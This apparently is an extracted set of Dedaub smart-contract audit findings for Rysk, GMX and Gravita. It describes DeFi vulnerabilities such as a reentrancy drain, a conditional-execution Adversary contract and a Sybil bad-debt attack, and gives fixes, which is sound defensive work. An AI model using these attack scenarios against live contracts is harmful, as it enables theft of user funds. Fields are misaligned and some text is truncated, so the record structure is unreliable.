"title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "library's lognormalVol() can in principle return negative values ACKNOWLEDGED The formula of the SABR model that is responsible for computing the implied volatility (https://web.math.ku.dk/~rolf/SABR.pdf formula (2.17a)) is an approximate one. It is not clear to us if this value will always be non-negative as it should be. For example, for absolute values of ρ close to 1 and large values of v, the last term of this formula, and probably the whole value of the implied volatility, will be negative. The execution of VolatilityFeed::getImpliedVolatility will revert if the value returned by lognormalVol() is negative, to protect the protocol from using this absurd value. Nevertheless, if this keeps happening for a while, the protocol will be unable to price the options and therefore will be unable to work. This issue could be avoided either by a careful choice of the SABR parameters by the protocol's keepers or by using an alternative volatility feed in case this happens.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "check in BeyondPricer's quoteOptionPrice() RESOLVED In BeyondPricer::quoteOptionPrice() a check that _optionSeries.expiration >= block.timestamp is missing. If the function is called to price an option series with a past expiration date, it will return an absurd result. 
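A sketch of the missing guard at the top of quoteOptionPrice() (the custom error name is hypothetical):

if (_optionSeries.expiration < block.timestamp) {
    // Dedaub (sketch): refuse to price an already-expired series
    revert OptionExpired();
}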
We suggest adding such a check, which would revert the execution with an appropriate message in case the condition is not satisfied.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "is defined as public even though its name suggests otherwise RESOLVED Function OptionExchange::_checkHash, which returns whether an option series is approved or not, is defined as public. However, the starting underscore in _checkHash implies that this functionality should not be exposed externally (via the public modifier), creating an inconsistency, even though it is probably useful/necessary to the users of the protocol.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "returns an incorrect value RESOLVED Whenever a user wants to buy an amount of options, first it is checked if the long exposure of the protocol to this option series is positive. If this is the case, then the protocol first sells the options it holds, to decrease its long exposure, and if they are not enough, then the Liquidity pool writes extra options to reach the amount requested by the user. The problem is that the _buyOption function, in the case the Liquidity pool is called to write these extra options, returns only this extra amount, and not the total amount sold to the user.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "of compiler versions RESOLVED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. It is recommended that the compiler version is fixed to a specific version and that this is kept consistent amongst source files. A10 Compiler bugs ACKNOWLEDGED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. Versions 0.8.0 and 0.8.9, in particular, have some known bugs, which we do not believe affect the correctness of the contracts.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "has unlimited spending approval RESOLVED In the GmxHedgingReactor constructor the gmxPositionRouter is approved to spend an infinite amount of _collateralAsset. It appears that this is unneeded and potentially dangerous, as the transfer of _collateralAsset is actually handled by the GMX router, which gets approved for the exact amount needed in the function _increasePosition, and not by the gmxPositionRouter.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "returns in _changePosition RESOLVED The function GmxHedgingReactor::_changePosition is not consistent with the values it returns. Even though it should always return the resulting difference in delta exposure, it does not do so at the end of the if-branch of the if (_amount > 0) { } statement. 
If the control flow reaches that point, it jumps to the end of the function, leading to 0 being returned, i.e., as if there was no change in delta. function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. // Dedaub: last statement is not a return increaseOrderDeltaChange[positionKey] += deltaChange; } else { // .. return deltaChange + closedPositionDeltaChange; } return 0; } We would suggest the following fixes: function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. return deltaChange + closedPositionDeltaChange; } else if (_amount < 0) { // .. return deltaChange + closedPositionDeltaChange; } return 0; } Currently the return value of _changePosition is further returned by the function hedgeDelta and remains unused by its callers. However, this could change in future versions of the protocol, leading to bugs.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "long and short positions could co-exist RESOLVED GMX treats longs and shorts as completely separate positions, and charges borrowing fees on both simultaneously, thus the reactor deals with positions in such a way that ensures only a single position is open at a certain time. Nevertheless, due to the two-step process that GMX uses to create positions and the fact that the reactor does not take into account that a new position might be created while another one is waiting to be finalized, there exists a scenario in which the reactor could end up with a long and a short position at the same time. The scenario is the following: 1. Initially, there are no open positions 2. A long or short position is opened on GMX but is not executed immediately, i.e., GmxHedgingReactor::gmxPositionCallback is not called. The LiquidityPool reckons that a counter position should be opened and calls GmxHedgingReactor::hedgeDelta to do so. 3. When the two position orders are finally executed by GMX the reactor will have a long and a short position open simultaneously. The above scenario might not be likely to happen, as it requires the LiquidityPool to open two opposite positions in a very short period of time, i.e., before the first position order is executed by a GMX keeper or a keeper of the protocol. Nevertheless, we believe it would be better to also handle such a scenario, as it could mess up the reactor's accounting and the fix should be relatively easy.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "in some cases underestimates the extra collateral needed for an increase of a position ACKNOWLEDGED Whenever the hedging reactor asks for an increase of a position, _getCollateralSizeDeltaUsd() computes the extra collateral needed using collateralToTransfer (collateral needed to be added or removed from the position before its increase, to maintain the health at the desired value) and extraPositionCollateral (the extra collateral needed for the increase of the position). If isAboveMax==true and extraPositionCollateral > collateralToTransfer, then the collateral which is actually added is just totalCollateralToAdd= extraPositionCollateral - collateralToTransfer, which could be insufficient to collateralize the increased position. Let us try to explain this with an example. Suppose that initially there is a long position with position[0]=10_000, position[1]=5_000. 
The hedging reactor then asks for an increase of its position by 11_000. extraPositionCollateral will be 5_500. Suppose that in the meantime this position had substantial profits, i.e. positive unrealised pnl=5_000. collateralToTransfer will be 5_000 and totalCollateralToAdd will be 5_500-5_000=500. Therefore the \"leverage without pnl\" of the new position will be (10_000+11_000)/(5_000+500)=21_000/5_500=3.8. If this scenario is repeated, it could lead to the liquidation of the position. We suggest adding a check that the total size of the position does not exceed its total collateral times maxLeverage, similar to the one used in the case of decreasing a position. LOW SEVERITY: ID Description ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "does not remove the old PositionRouter RESOLVED The function GmxHedgingReactor::setPositionRouter sets gmxPositionRouter to the new GMX PositionRouter contract that is provided and calls approvePlugin on the GMX Router contract to approve it. It does not revoke the approval to the old PositionRouter contract, which from now on is irrelevant to the reactor, by calling the function denyPlugin of the GMX Router contract. L2 Potential underflow in checkVaultHealth RESOLVED If a position is in loss, the formula of the health variable is the following one: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():344 health=(uint256((int256(position[1])-int256(position[8])).div(int256(position[0]))) * MAX_BIPS) / 1e18; There is no check if the difference (int256(position[1])-int256(position[8])) in the above formula is positive or not. It is possible, under specific economic conditions (and if the GMX Liquidators are not fast enough), that the result of this difference is negative. In such a case, the resulting value will be erroneous because of an underflow error. Even if this scenario is not expected to happen on a regular basis, we suggest adding a check that this difference is indeed positive and, if it is not, extra measures should be taken to avoid liquidations. Note that the same issue appears in getPoolDenominatedValue, leading to the execution reverting if an underflow occurs. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) OTHER/ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. 
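As a concrete illustration of the check suggested in L2 above, the health computation could be guarded along the following lines (a sketch reusing the names of the quoted formula):

int256 diff = int256(position[1]) - int256(position[8]);
// Dedaub (sketch): the loss can exceed the collateral if liquidators lag;
// never cast a non-positive difference to uint256
if (diff <= 0) {
    health = 0; // treat the position as critically unhealthy instead of underflowing
} else {
    health = (uint256(diff.div(int256(position[0]))) * MAX_BIPS) / 1e18;
}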
", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Low" + ] + }, + { + "title": "wastes gas ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": " INFO The function GmxHedgingReactor::getPoolDenominatedValue wastes gas by calling the function checkVaultHealth to retrieve just the currently open GMX position instead of directly calling the _getPosition function.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "can be made more gas eicient INFO The function GmxHedgingReactor::gmxPositionCallback is responsible for updating the internalDelta of the reactor with the values that are stored in the mappings increaseOrderDeltaChange and decreaseOrderDeltaChange. These mappings are essentially used as temporary storage before the change in delta is applied to the internalDelta storage variable. Thus, after a successful update the associated mapping element should be deleted to receive a gas refund for freeing up space on the blockchain.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "can be made more gas eicient INFO The function GmxHedgingReactor::sync is implemented to consider the scenario where a long and a short position are open on GMX at the same time. function sync() external returns (int256) { _isKeeper(); uint256[] memory longPosition = _getPosition(true); uint256[] memory shortPosition = _getPosition(false); uint256 longDelta = longPosition[0] > 0 ? 01 (longPosition[0]).div(longPosition[2]) : 0; uint256 shortDelta = shortPosition[0] > 0 ? (shortPosition[0]).div(shortPosition[2]) : 0; internalDelta = int256(longDelta) - int256(shortDelta); return internalDelta; } However, the reactor in whole is implemented in a way that ensures that a long and a short position cannot co-exist. Thus, the sync function can be implemented to take into account only the current open position, making it more eicient in terms of gas usage.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "computations INFO In GmxHedgingReactor::_getCollateralSizeDeltaUsd there is the following code: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():670 if ( int256(position[1] / 1e12) - int256(adjustedCollateralToRemove) < int256(((position[0] - _getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000)) ) { adjustedCollateralToRemove = position[1] / 1e12 - ((position[0]-_getPositionSizeDeltaUsd(_amount,position[0])) / 1e12) / (vault.maxLeverage() / 11000); if (adjustedCollateralToRemove == 0) { return 0; } } Observe that the quantity (position[0]-_getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000) is computed twice which can be avoided by computing it once and storing its value to a local variable. 
The same is true for the quantity _amount.mul(position[2] / 1e12).div(position[0] / 1e12) that appears twice in the following computation: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():651 collateralToRemove = (1e18 - ( (int256(position[0]/1e12)+int256((leverageFactor.mul(position[8]))/1e12)) .mul(1e18-int256(_amount.mul(position[2]/1e12).div(position[0]/1e12))) .div(int256(leverageFactor.mul(position[1])/1e12)) )).mul(int256(position[1]/1e12)) - int256(_amount.mul(position[2]/1e12).div(position[0]/1e12) .mul(position[8]/1e12)); The above computation can be simplified even further by applying specific mathematical properties: uint256 d = _amount.mul(position[2]).div(position[0]); collateralToRemove = (int256(position[1] / 1e12) - ( ((int256(position[0]) + int256(leverageFactor.mul(position[8]))) / 1e12) .mul(1e18 - int256(d)).div(int256(leverageFactor)) )) - int256(d.mul(position[8] / 1e12));", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "calls INFO The functions _increasePosition and _decreasePosition of the reactor unnecessarily call gmxPositionRouter's minExecutionFee function twice each instead of caching the returned value in a local variable after the first call.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "comment in _increasePosition INFO The comment describing the parameter _collateralSize of the function _increasePosition should read \"amount of collateral to add\" instead of \"amount of collateral to remove\".", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "errors The following errors are defined but not used: INFO // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():88 error ValueFailure(); error IncorrectCollateral(); error IncorrectDeltaChange(); error InvalidTransactionNotEnoughMargin(int256 accountMarketValue, int256 totalRequiredMargin); A8 Compiler bugs INFO The code is compiled with Solidity 0.8.9, which, at the time of writing, has some known bugs, which we do not believe to affect the correctness of the contracts.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "vulnerability in cancelOrder ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " OPEN OrderHandler::cancelOrder, which is an external function, is not protected by a reentrancy guard. Moreover, OrderUtils::cancelOrder (which performs the actual operation) transfers funds to the user (orderStore.transferOut) before updating its state. As a consequence, a malicious adversary could re-enter cancelOrder, and execute an arbitrary number of transfers, effectively draining the contract's full balance in the corresponding token. 
function cancelOrder( DataStore dataStore, EventEmitter eventEmitter, OrderStore orderStore, bytes32 key, address keeper, uint256 startingGas ) internal { Order.Props memory order = orderStore.get(key); validateNonEmptyOrder(order); if (isIncreaseOrder(order.orderType()) || isSwapOrder(order.orderType())) { if (order.initialCollateralDeltaAmount() > 0) { orderStore.transferOut( EthUtils.weth(dataStore), order.initialCollateralToken(), order.initialCollateralDeltaAmount(), order.account(), order.shouldConvertETH() ); } } // Dedaub: state changed after the transfer, also idempotent orderStore.remove(key, order.account()); Note that the main re-entrancy method, namely the receive hook of an ETH transfer, is in fact protected by using payable(receiver).transfer, which limits the gas available to the adversary's receive hook. Nevertheless, an ER", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "transfer is an external contract call and should be assumed to potentially pass the execution to the adversary. For instance, an ERC777 token (which is ERC20 compatible) would implement transfer hooks that could easily be used to perform a reentrancy attack. Note also that the state update (orderStore.remove(key, order.account())) is idempotent, so it can be executed multiple times during a reentrancy attack without causing an error. To protect against reentrancy we recommend 1. Adding reentrancy guards, and 2. Executing all state updates before external contract calls (such as transfers). Note that (2) by itself is sufficient, so reentrancy guards could be avoided if gas is an issue. In such a case, however, comments should be added to the code to clearly state that updates should be executed before external calls, to avoid a vulnerability being reintroduced in future restructuring of the code. HIGH SEVERITY: ID Description ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "execution of orders using shouldConvertETH OPEN For all order types that involve ETH, a user can set the option shouldConvertETH = true to indicate that he wishes to receive ETH instead of WETH. Although convenient, this gives an adversary the opportunity to execute conditional orders in a very easy way. The adversary can simply use a smart contract as the receiver of the order, and set a receive function as follows: contract Adversary { bool allow_execution = false; receive() { require(allow_execution); } } Then, in the time period between the order creation and its execution, the adversary can decide whether he wishes the order to succeed or not, and set the allow_execution variable accordingly. If unset, the receive function will revert and the protocol will cancel the order. The possibility of conditional executions could be exploited in a variety of different scenarios; a concrete example is given at the end of this item. Note that the use of payable(receiver).transfer (in Bank::_transferOutEth) does not protect against this attack. The 2300 gas sent by transfer are enough for a simple check like the one above. Note also that, although the case of ETH is the simplest to exploit, any tokens that use hooks to allow the receiver to reject transfers (e.g., ERC777) would enable the same attack. 
Note also that, if needed, the time period between creation and execution could be increased by simultaneously submitting a large number of orders for tiny amounts (see L2 below). One way to protect against conditional execution is to employ some manual procedure for recovering the funds in case of a failed execution (for instance, keeping the funds in an escrow account), instead of simply canceling the order. Since a failed execution should not happen under normal conditions, this would not affect the protocol's normal operation. Concrete example of exploiting conditional executions: The adversary wants to take advantage of the volatility of ETH at a particular moment, but without any trading risk. Assume that the current price of ETH is 1000 USD; he proceeds as follows: - He creates a market swap order A to buy ETH at the current price. In this order, he sets shouldConvertETH = true and the receive function above that conditionally allows the execution. - He also creates a limit order B to sell ETH at 1010 USD. He then monitors the price of ETH before the orders' execution: - If ETH goes down, he does nothing. allow_execution is false so order A will fail, and order B will also fail since the price target is not met. - If ETH goes up, he sets allow_execution = true, which leads to both orders succeeding for a profit of 10 USD / ETH. MEDIUM SEVERITY: ", + "labels": [ + "Dedaub", + "GMX", + "Severity: High" + ] + }, + { + "title": "handling of rebalancing token ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " OPEN StrictBank::recordTokenIn computes the number of received tokens by comparing the contract's current balance with the balance at the previous execution. However, this approach could lead to incorrect results in the case of ER", + "labels": [ + "Dedaub", + "GMX", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "with non-standard behavior, for instance: - Tokens in which balances automatically increase (without any transfers) to include interest. - Tokens that allow interacting from multiple contract addresses. To be more robust with respect to such types of tokens, we recommend comparing the balance before and after the current incoming transfer, and not between different transactions.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "bad debt attack OPEN The protocol is susceptible to an attack involving opening a delta neutral position using Sybil accounts, with maximum leverage, on a volatile asset. Scenario: 1. Attacker controls Alice and Bob 2. Alice opens a large long position with maximum leverage 3. Bob opens a large short position with maximum leverage 4. Market moves 5. Alice liquidates their underwater position, causing bad debt 6. Bob closes their other position, profiting on the slippage The reason why this attack is possible is that, using the current design, it takes multiple blocks for a liquidator to react, and by the time their order is executed it is possible that one of the positions is underwater. Secondly, when liquidating, Alice does not suffer a bad price from the slippage incurred in the liquidation, but Bob benefits from the slippage when closing their position just after. 
Another factor that contributes towards this attack is that the liquidation penalty is linear, while the price impact advantage is higher-order, making the attack increasingly profitable the larger the positions. To deter this, the protocol could support (i) partial liquidations for large positions and therefore force the positions to be closed gradually, making the attack non-viable, and (ii) slippage open-interest calculations used to determine the price of the liquidation. LOW SEVERITY:", + "labels": [ + "Dedaub", + "GMX", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "receive function OPEN OrderStore does not contain a receive function so it cannot receive ETH. However, this is needed by Bank::_transferOutEth, which withdraws ETH before sending it to the receiver. function _transferOutEth(address token, uint256 amount, address receiver) internal { require(receiver != address(this), \"Bank: invalid receiver\"); IWETH(token).withdraw(amount); payable(receiver).transfer(amount); _afterTransferOut(token); } Without a receive function any transaction with shouldConvertETH = true would fail.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "lower bounds for swaps and positions OPEN Since there are no lower bounds for the size of a position, someone could in principle create a large number of tiny orders. Such a strategy would cost the adversary only the gas fees and the total amount of the requested positions, which can be as small as he wishes. In the 2-step procedure used in this version of the protocol, such behavior could potentially create a problem, because the order keepers would have to execute a huge number of orders. We suggest setting a minimum size for positions and swaps. L3 Inconsistency in calculating liquidations OPEN The comment in PositionUtils::isPositionLiquidatable indicates that price impact is not used when computing whether a position is liquidatable. However, the price impact is in fact used in the code: // price impact is not factored into the liquidation calculation // if the user is able to close the position gradually, the impact // may not be as much as closing the position in one transaction function isPositionLiquidatable( DataStore dataStore, Position.Props memory position, Market.Props memory market, MarketUtils.MarketPrices memory prices ) internal view returns (bool) { ... int256 priceImpactUsd = PositionPricingUtils.getPriceImpactUsd(...) int256 remainingCollateralUsd = collateralUsd.toInt256() + positionPnlUsd + priceImpactUsd + fees.totalNetCostAmount; On the other hand, when the liquidation is executed, the price impact is not used. The comment in DecreasePositionUtils::processCollateral indicates that this is intentional: // the outputAmount does not factor in price impact // for example, if the market is ETH / USD and if a user uses USDC to long ETH // if the position is closed in profit or loss, USDC would be sent out from or // added to the pool without a price impact // this may unbalance the pool and the user could earn the positive price impact // through a subsequent action to rebalance the pool // price impact can be factored in if this is not desirable If this inconsistency is intentional, it should be properly documented in the comments. 
Note that, when deciding on a liquidation strategy, you should bear in mind the possibility of cascading liquidations, namely the possibility that executing a liquidation causes other positions to become liquidatable. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ", + "labels": [ + "Dedaub", + "GMX", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "keepers can cause DoS in all operations OPEN Due to the two-step execution system, any operation requires an order keeper to execute it. Trust is needed that order keepers will execute all pending orders in a timely manner. If the order keeper does not submit execution transactions, all operations will cease to function, including closing positions and withdrawing funds. It would be beneficial to implement fallback mechanisms that guarantee that users can at least withdraw their funds in case order keepers cease to function for any reason. For instance, the protocol could allow users to execute orders by providing oracle prices themselves, but only if an order is stale (a certain time has passed since its creation). N2 Order keepers can frontrun/reorder transactions There is nothing in the current system that prevents an order keeper from front-running or reordering transactions, for instance to exploit changes in the price impact. The protocol could include mechanisms that limit this possibility: for instance, the order keeper could be forced to execute orders in the same order they were created. OTHER/ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "erroneous computation of price impact ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " INFO Price impact is calculated as (initial imbalance) ^ (price impact exponent) * (price impact factor) - (next imbalance) ^ (price impact exponent) * (price impact factor). The values of the exponent (e) and impact factor (f) are set by the protocol for each market. If the impact factor is simply a percentage, then the price impact will have units USD^(price impact exponent). But this seems erroneous, since price impact is treated as a USD amount which is finally added to the amount requested by the user. A problem arises in case these two quantities are selected independently of each other, and also of the pool's deposits and status. For example, consider a pool with tokens A and B of total USD value x and y respectively. Consider that x < y. Then the imbalance equals d = y - x. If a user swaps A tokens of worth d/2, then prior to the price impact he will get B tokens of the same value. The new deposits of the pool will now be x'=y'=(x+y)/2 and the pool will become balanced. 
The price impact for this transaction is f*d^e, which could be (if the parameters are not chosen carefully) larger than d/2, which is the requested swap amount. Also, this fact could lead to a pool which is even more imbalanced than the previous state. We suggest that (total_deposits)^(e-1)*f always be less than 1 to avoid the above-mentioned undesirable behavior.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "in the submission time of different tokens INFO Price keepers are responsible for submitting prices for most of the protocol's tokens. The submitted price should be the price retrieved from exchange markets at the time of each order's creation (the median of all these prices is finally used). However, for some tokens Chainlink oracles are used. In this case, the price at the time of the order execution is used.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "user can liquidate its own position INFO ExchangeRouter::createLiquidation can be called only by liquidation keepers. However, there is nothing preventing a user from calling createOrder with orderType=Liquidation, effectively creating a liquidation order for their own position. Although this is not necessarily an issue, it is unclear whether this functionality is intentional or not.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "price impacts on large markets INFO The price impact calculation is a function with an exponential factor of the absolute differences between open long and short interests before and after a trade. This works well for the average market, but on a large market with large open interests, it is not more efficient to open large positions. Consider that in other AMM designs, it is possible to open large positions with minimal price impact if the market is large (e.g., Uniswap ETH-USDC). A5 Known compiler bugs INFO The code can be compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, but a specific version, to be confident about the baseline guarantees offered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe affect the correctness of the contracts.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "does not check if it is overwriting a previous queued oracle ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " RESOLVED (not applicable as of e4fbfc30) In PriceFeed::addOracle, the queuedOracles entry for the token is written without checking whether it is zero. This is only a problem in case the controller makes a mistake, but the presence of a deleteQueuedOracle function suggests that the right behavior for a controller would be to delete a queued oracle if it is no longer valid. 
function addOracle(address _token, address _chainlinkOracle, bool _isEthIndexed) external override isController { AggregatorV3Interface newOracle = AggregatorV3Interface(_chainlinkOracle); _validateFeedResponse(newOracle); if (registeredOracles[_token].exists) { uint256 timelockRelease = block.timestamp.add(_getOracleUpdateTimelock()); queuedOracles[_token] = OracleRecord(newOracle, timelockRelease, true, true, _isEthIndexed); } else { registeredOracles[_token] = OracleRecord(newOracle, block.timestamp, true, true, _isEthIndexed); emit NewOracleRegistered(_token, _chainlinkOracle, _isEthIndexed); } } function deleteQueuedOracle(address _token) external override isController { delete queuedOracles[_token]; }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "timelock for adding oracles can be circumvented by deleting the previous oracle RESOLVED (not applicable as of e4fbfc30) On the same code as issue L1, in the PriceFeed contract, the controller can always subvert the above timelock by just deleting the registered oracle. function deleteOracle(address _token) external override isController { delete registeredOracles[_token]; } Thus, the timelock can only prevent accidents in the controller, and not provide assurances of having a delay for review of changes to oracles.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "series of liquidations can cause the zeroing of totalStakes ACKNOWLEDGED The stake of a Vessel holding _asset as collateral is computed by the formula in VesselManager::_computeNewStake : stake = _coll.mul(totalStakesSnapshot[_asset]).div(totalCollateralSnapshot[_asset]); The stake is updated when the Vessel is adjusted; _coll is the new collateral amount of the Vessel, and totalStakesSnapshot, totalCollateralSnapshot are the total stakes and total collateral respectively right after the last liquidation. A liquidation followed by a redistribution of the debt and collateral to the other Vessels decreases the total stakes (the stake of the liquidated Vessel is just deleted and not shared among the others), while the total collateral (if we ignore the fees) does not change. Therefore the ratio in the above formula is constantly decreasing after each liquidation followed by redistribution, and each new Vessel will get a relatively smaller stake. The finite precision of the arithmetic operations can lead to a zeroing of totalStakes, if a series of liquidations of Vessels with high stakes occurs. If this happens, the total stakes will be zero forever and each new vessel will be assigned a zero stake. If this happens, many functionalities of the protocol are blocked, e.g., VesselManager::redistributeDebtAndCollateral will revert every time, since the debt and collateral to distribute are computed by dividing by the (zero) totalStakes. The probability of such a problem is higher in Gravita, compared to Liquity, because Gravita allows multiple collateral assets, some of them, in principle, more volatile compared to ETH.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 
23.pdf", + "body": "could return arbitrarily stale prices, if the Chainlink Oracle's response is not valid RESOLVED (e4fbfc30) The protocol uses PriceFeed::fetchPrice to get the price of a _token whenever it needs to. This function first calls the Chainlink oracle to get the price for this _token and then checks the validity of the response. If it is valid, it stores the answer in lastGoodPrice[_token] and also returns it to the caller. If the Chainlink response is not valid, the function instead returns the value stored in lastGoodPrice[_token]. The problem is that this value could have been stored a long time ago, and there is no check for this in the contract. As an edge case, if the Chainlink oracle does not give a valid answer upon its first call for a _token, PriceFeed::fetchPrice will return a zero price. Liquity uses a secondary oracle if the response of Chainlink is not valid, and only if both oracles fail is the stored last good price used; in Gravita, however, there is no secondary oracle.
